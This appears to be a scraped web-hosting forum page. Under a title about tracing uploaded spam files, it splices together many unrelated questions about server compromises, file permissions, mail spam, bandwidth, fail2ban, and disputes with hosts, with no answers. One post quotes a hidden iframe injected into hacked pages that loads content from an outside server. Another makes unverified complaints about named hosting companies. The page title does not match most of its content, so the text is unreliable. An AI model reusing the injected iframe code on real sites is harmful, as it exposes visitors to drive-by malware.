How To Find How And Who Uploaded Files- Spam - Action I Can Take
Mar 27, 2009
I have a dedicated server, the server itself is secure (as far as I know) and I run lots of my sites from it. I offered a friend hosting for his flash based chat application he built.
Today I was contacted by someone; "Are you the owner of xxxx.net?" so I informed that yes, it was my server and they then showed me an email they'd received from my server. I did a search and apparently someone uploaded mail.php and a couple of files it was using to send out spam based upon a variety of conditions that the other files met. The files contained forenames and surnames, it'd use a forename and a surname then send it to popular free mail services. The email contained ramblings about new world order and promoted a website.
How can I find out how they got the files uploaded to the account and what action can I take? I checked the whois for the domain and have their contact information, however it's a large site so I'm doubtful that the owner did it. I don't want my servers IPs being blacklisted for spam :|
I used to have my apache 1.3.37 with PHP compiled as a CGI. Whenever i have a php script (say vbulletin forum software) that allow file uploads, files will be uploaded with the correct userid and groupid on the server. However, once i compiled PHP as ISAPI module, the files will be uploaded but will be owned by 'nobody'. Of course i can log in as root and chown it back to the right user, but it's a hassle if there are multiple user accounts on the server and they're using php software on their end. If someone is using an ftp program and tries to overwrite that uploaded file that's owned by nobody, it will not let them do so. Is there a way to fix this, or change the config files that would fix it?
I am wanting to know if there is a way to stop files being uploaded to my vps, via ftp cpanel etc that are malicious..
I have been told there is a way to do this but i havent been told how..
Basicaly i want to know if there is something where i can add a list of keywords that are in the malicious files and what ever it is will stop them from being uploaded or if they manage to get uploaded onto my vps will it make them not work?
I am looking into this as i had an issue before where someone uploaded a shell onto my server :@ luckily it didnt cause no damage or he didnt get anywhere but i still want to be safe.
I have a RHEL 4 plain server, and im using vsftpd server, i can not find an option to specify the max size for uploading files... does anybody know something about this?
I've recently started experiencing some issues where files uploaded through Joomla or some other scripts (mostly PHP) inherit a permission of 600. Prior to updates being done on the server I'm hosted on, uploaded files received 644 permissions and all things worked great.
I've checked the umask that assigned to the shell (022) and have ruled out that as a problem.
I have a web blog that shows promise of growing pretty big soon! This is a vbulletin whith chatbox and arcade games. The forum is for gamers and game modification talk. I want to keep my features such as in forum mp3 player for streaming music. I host no files everything is linked from outside sources. Even photos are linked from photo hosts. I forsee about 20-30 members on at all time browsing and chatting in chatbox. Playing in the online arcade!
I have no idea how much bandwidth all this will use up. I do know that 20-40 gig of space should be quite enough but as always I want all I can get. As far as bandwidth I have no idea what all those features will eat up.
I have looked at fatcow.com and talked to them they said their unlimited is this 300gig space 3000 gig bandwidth and they do not keep up with msql databases. I looked on BBB and they have an A+ record if compared to hostgator they have unsatifatory! The only problem is they are yearly contract only. I do not trust this! I also have to let them re-bill me at end of year and this gives them access to my account. The payment options are check,paybal, or credit.
Not far ago somebody hacked our customer account through the vulnerability in phpBB Album module and uploaded some scripts. Then it started to send nigerian spam using exim and apache. These scripts were found and deleted and the Album module was fully deleted too. But when I look at the processes now I see that exim and httpd still start very often so the system resources are probably overused by them ......
I facing a serious problem with my qmail and plesk 11.0.9.I found the way spammer did with my server by listening everything on port 25. Maybe he know the RCPT hosts of mine, and they send emails with random username but with domain hosted on my Plesk. (user1@mydomain.com, user2@ my domain.com, ... userxxx@mydomain.com).
qmail only check domain in RCPT if spammer input:"mail from user1@mydomain.com" - (with out ":") - no email address on my server.then server reply: 550, no mailbox here by that name. (#5.7.17)
But qmail check username and domain if spammer input:""mail from: user1@mydomain.com" - (with ":") - no email address on my server. Then server reply: 250 OK..This is really weird! I tried with all my plesk server, this bug still effected.Click to expand...
My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.
HTML Code: <iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden">< /iframe> The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
Is there a way to get Apache to tell me which .conf file it is loading at start-up?
There's a box that's misbehaving and Apache is running on port 80 and 8080 on the box... but we can't locate *why* it's running on port 8080. I can't find any Listen 8080 statement in the typical config files. If I knew which config files it was loading, I could go through all of the files in more detail.
We have just had reports of SPAM being sent from our CentOS 6.x server running Plesk 12.
Services like Plesk Premium antivirus, SpamAssasin, watchdog(rkhunter) and mod_security are enabled on the server to enhance security and none of these seemed to stop the scripts.
The issue is that multiple domains are sending out mail from this server, so it is difficult to find the script sending out SPAM. When we were running Plesk 11.0 we had a seperate log-file where we could see the file sending any mail going out from the postfix mailserver. I have check both /var/log/maillog and /usr/local/psa/var/log/maillog, but there is nothing in those files to tell me the file that sent the mail.
How would I go about finding this file from either the Plesk Control Panel or through SSH (using log-files)?
I have an odd problem... after transferring several hundred .php files to one of our servers we noticed that the browser was showing "?" output only.
When I open the file in "vi" (we're running centos 5.x), I can see this at the end of the file:
Code: ... </HTML> ^@^@<?php //comment goes here ?> ------------- I highlighted in red bold the problem text. If these four characters are removed from the file (edited out manually using vi) then the file displays and works correctly.
However.. there are several hundred of these files, and some have the problem and some don't.
I've tried everything I know to find which files contain the problem, but so far no luck.
ie:
grep -r "^@" .; grep -r "^@" .;
Basically.. I need to find any instance of these characters and then remove them.
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
a company named [url] was with us for almost 4, months and they are using the server which are custom ordered high end server, we didn't took setup fee just because they promise us to stay at list for an year
and from past 2 months they just ranned away somewhere, didn't paid any invoice i guess we did a big mistake by believing in them
i know these 2 servers wont make a big difference but still just for my info
can anyone suggest if we can take any legal action on them ? i know there site is still up and running
i would like to present to you a scenario im sure everybody has thought of and has come up against.
1. If you are hosting with a web host and your files and website has been compromised due to the lack of security on the server what actions can you take against the host for this loss?
2. The host has a backup dating back to a week, but of course the data you have accumulated for the week that was lost is very valuable but you cant get it back now because of a flaw with the hosts server, is there anything you can do in a situation like this?
3. What if you are a reseller and have setup several sites for customers. One customer uses a CMS which means he/she will be updaitng their website every now and then and not always you are able to make backups of all the websites hosted by you as the reseller.
Now a weeks or a few days of data have been lost. The client complains and wants to take legal action against the reseller (you) and of course the reseller knows its the problem with the main host you are hosting with. What does the reseller do now with the client and the host whos made the mistake?
4. Clients livelihood depends on his/her Ecommerce website, they make an average turnover. Whether you are hosting on a dedicated or VPS nevertheless data loss has occured because the box was compromised. The blame is put on the host. In a scenario like this what can the customer do? He/She has lost some client details/orders information and products as a whole...? Remember this is a business... and money has been lost. A recovery backup a week old will never be sufficient enough for the loss.
Think about it... what will you do if any of the above four scenarios were to happen to you?
Yes i am aware of the terms. Some hosts will say they are not responsible forData loss in their small prints, Some will say it is soley up to the customer to make backups, When it comes to court they will point this out, and you'll be kicking yourself for being so foolish to go with a host in the first place which dosent gurantee the safety of your data.
Customers dont always read the small fine prints. Now realistically speaking what can the customer/client do in a situation like this? Im guessing nothing if the host outlines the terms ive pointed out above?
Is there really a host out there which takes whole responsibility for the loss and damage they create to your websites and businesses online?
The worst hosting you can get is Hostdepartment.com followed by Webhostasp.com and then Vortechhosting.com. All these have major complaints online. Hostdepartment servers are down about 50/50. 50% of the time the server will have problems and downtime throughout the day. Maybe not down for hours, but the servers will drop from time to time maybe 10 minutes here and there. Also Ixwebhosting.com surprisingly has downtime. The server is actually currently down as this is being written. For those who wish to gather a class action lawsuit against hostdepartment, webhostasp or vortechhosting, you may contact me at cashzzz at hotmail. Alertra is a good tool for monitoring your site.
Well with activated apache-badbots jails I have in a short time a hugh amount of banned IPs. Usualy action for this is to use iptables-ipset-proto and save all this baned IPs in the ipset insteed as normal in the iptables list - thats also a suggestion which was discussed in the fail2ban forum for better performance. And yes I had this running (ipset package installed) with my manual installation of fail2ban before I switched over to the plesk integrated.
action = iptables-ipset-proto6[name=BadBots, port="http,https,7080,7081"] insteed of action = iptables-multiport[name=BadBots, port="http,https,7080,7081"]
So how can I add iptables-ipset-proto4.conf, iptables-ipset-proto6-allports.conf, iptables-ipset-proto6.conf to the plesk version of fail2ban??
Let's suppose you have a site on a shared hosting plan, and all of the sudden it gets a huge surge in traffic as a result of being featured in the news or something like that. What would be a good plan of action to deal with the surge quickly?
(ex. maybe your hosts takes the site offline from bandwidth overuse)
how can i do a search for all files (probs using regex) of files consisting purely of numbers?
for e.g. find:
53243.php 24353.php 24098.php
(always have 5 numbers).
seems one of my accounts has had some script run which generated a bunch of these in various subfolders, and the php file basically does a callback to www3.rssnews.ws and www3.xmldata.info, which seem to be some sort of spyware servers.
Does anyone know the proper avenue for cancelling an account with HostNine? They are giving me the run around and ignoring my requests for a cancellation. I originally tried to cancel my account a couple of months ago by e-mail. They informed me that I had to submit a cancellation request through their website. I have submitted a cancellation request through their website SEVERAL TIMES since then. They never sent me any kind of response or confirmation, so I assumed (wrongly, I guess) that the account was cancelled, but they keep charging my credit card over and over.
I have requested again that the account be cancelled and told them that I would simply perform a chargeback since they are basically billing me for a service that I have continually requested be cancelled via their own online cancellation form using their own process for cancelling accounts. Nick Hudson @ HostNine's response to this was to threaten that they would send attorneys and collection agencies after me. All while claiming that it is "NOT hard" to cancel an account. I agree with them; cancelling your account when the company will actually deal with you should not be hard.
I log in to FTP and I try and upload an updated file (the file already exists on server). It prompts me to overwrite and I say yes but when I refresh/check the site the page hasnt changed - I then tried uploading the file again and it still says the existing file size (so I know it hasnt been replace).
Any idea why it it not overwriting?
The files are CHOWNed my the owner (FTP user) which is myself.
